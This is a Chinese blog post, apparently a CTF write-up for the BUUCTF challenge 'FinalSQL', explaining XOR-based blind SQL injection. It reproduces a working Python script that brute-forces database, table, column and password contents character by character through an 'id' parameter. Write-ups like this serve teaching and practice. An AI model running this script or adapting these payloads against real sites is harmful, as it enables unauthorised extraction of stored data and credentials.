首页 > 数据库 >异或sql注入

异或sql注入

时间:2023-10-06 16:46:16浏览次数:41  
标签:group format flag 异或 num sql 注入 payload schema

来自

[极客大挑战 2019]FinalSQL

开始以为是正常的sql注入,因为这五个都点不出东西。

但是常规和非常规方法都用过了,fuzz了半天发现全给过滤完了。

看了看其他wp才发现注入点就在这五个数字这里,用的知识点叫异或注入。

后续就是我自己的复现了。

这里有个异或注入的博客:

https://www.jianshu.com/p/d41ba0cb3f79

这里借用一下博客:https://blog.csdn.net/qq_60829702/article/details/127445276的盲注脚本:

'''
注:这里加上time.sleep可以正确的把buuctf中的题目数据正确爆出来。timeout应该不用加,但是加了也没事
'''
import requests
import string
import time

strings = string.printable
flag = ''

for num in range(1,300):
    time.sleep(0.06)
    for i in strings:
        url='http://26817d9c-ef28-4799-a2dd-acbaf6e47b7c.node4.buuoj.cn:81/search.php'
        # payload='1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{0},1))={1})^1'.format(num,ord(i))    #爆数据库
        #information_schema,mysql,performance_schema,test,geek
        # payload="1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{0},1))={1})^1".format(num,ord(i))    #爆表
        # F1naI1y,Flaaaaag
        # payload="1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),{0},1))={1})^1".format(num,ord(i))    #爆列名
        # F1naI1y:id,username,password          Flaaaaag:id,fl4gawsl
        # payload='1^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{0},1))={1})^1'.format(num,ord(i))
        payload='1^(ascii(substr(reverse((select(group_concat(password))from(F1naI1y))),{0},1))={1})^1'.format(num,ord(i))                           #爆字段
                                   #爆字段

        get_data={"id":payload}
        res = requests.get(url,params=get_data,timeout=5)
        time.sleep(0.04)
        if 'this' in res.text:
            flag += i
            print(flag)
        else:
            continue
print(flag)

注意:这里爆数据使用了reverse是因为原博主看一些师傅的wp发现flag是在最后的,前面特别多无用的数据要爆很久,然后直接取巧了。
大家也可以使用二分法的方式来爆数据,时间肯定比我这个程序快,实现起来也不难,但是我就偷一点懒,等下一次碰到盲注的题目试一下二分法。还有最后搞出来的数据大家反转一下就是flag了。

标签:group,format,flag,异或,num,sql,注入,payload,schema
From: https://www.cnblogs.com/EddieMurphy-blogs/p/17744694.html

相关文章

  • 如何远程修复损坏的mysql数据库
    当mysql数据库出现错误需要修复时,可以用mysqlcheck这个命令修复点击开始-运行,输入c:\mysqlcheck -r -u用户名 -p数据库密码 -h服务器地址 数据库名回车即可,如:c:\mysqlcheck -r -udemo -pdemo -h218.89.170.62 demo......
  • 如何连接mysql数据库?
    下面的例子是用PHP4连接一个mysql数据库操作的演示<?    /*本例是用PHP4连接一个mysql数据库操作的演示,    实现连接打开一个库,并读取数据的基本功能。    */?><HTML><HEAD><META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"><style type="text/c......
  • 清空MYSQL数据库的简单办法
    直接在控制面板中点“清空mysql数据库”即可。 也可以用如下办法:保存为***.php运行就OK了<?php$user="";//数据库用户名$password="";//数据库密码$db_name="";//数据库名$link=mysql_connect("localhost:3306",$user,$password);mysql_select_db("$db_name......
  • 手工升级ACCESS到SQLSERVER
    1、必须先安装MicrosoftOfficeAccess2003,和SQLServer2000。 2、把旧的数据库备份,备份完成后,用Access2003打开MDB数据库,在打开时会出现一个警告,不要理会它(安全警告),按打开键,打开后按工具栏——数据库实用工具——转换数据库——转换为2002-2003格式,把数据库转换成2003格式......
  • webapi 登录接口acctID参数获取SQL
    USEK3DBConfiger20216155555176selectA.FNUMBER,B.FNAME,A.FDATABASENAME,A.FDATACENTERIDFROMT_BAS_DATACENTERASALEFTJOINT_BAS_DATACENTER_LASBONA.FDATACENTERID=B.FDATACENTERIDANDA.FLANGUAGE=B.FLOCALEID FDATACENTERID字段......
  • 算法异或的运用
    题目描述在一条无限长的路上,有一排无限长的路灯,编号为1,2,3,4,…。每一盏灯只有两种可能的状态,开或者关。如果按一下某一盏灯的开关,那么这盏灯的状态将发生改变。如果原来是开,将变成关。如果原来是关,将变成开。在刚开始的时候,所有的灯都是关的。小明每次可以进行如下的操作:指......
  • 202310061227-《心得:低版本mysql配置一,些轮子插件》
    1.对于mysql5.7.42,驱动(connector)选择:5.1.46。2.测试链接时:useSSL=true&enabledTLSProtocols=TLSv1.1 驱动链接字符串上要拼接上。3.驱动链接字符串:高版本mysql,意味着高版本connector,选>=8;低版本,选择5.x;               高版本mysql,com.my......
  • 华为云云耀云服务器L实例评测 | 快速部署MySQL使用指南
    文章目录前言云耀云服务器L实例介绍什么是云耀云服务器L实例?产品优势智能不卡顿价优随心用上手更简单管理更省心快速购买查看优惠卷购买安装MySQL重置密码安装更新apt的软件源列表安装MySQL设置用户名、密码、权限配置安全组总结前言哈喽大家好,我是阿Q。就在前几天,去年买的华为云......
  • 面试题:Redis和MySQL的事务区别是什么?
    大家好,我是小米!今天我要和大家聊聊一个在技术面试中经常被问到的问题:“Redis和MySQL的事务区别是什么?”这个问题看似简单,但实际上涉及到了数据库和缓存两个不同领域的知识,让我们一起来深入了解一下吧!什么是事务?首先,我们需要明确什么是事务。事务是数据库中的一个重要概念,它是一组数......
  • 【鱼授之以渔】如何安装和配置MySQL数据库?
    鱼弦:内容合伙人、新星导师、全栈领域创作新星创作者、51CTO(Top红人+专家博主)、github开源爱好者(go-zero源码二次开发、游戏后端架构https://github.com/Peakchen)如何安装和配置MySQL数据库?以下是安装和配置MySQL数据库的一般步骤:下载MySQL:访问MySQL官方网站,下载适用于您的操作......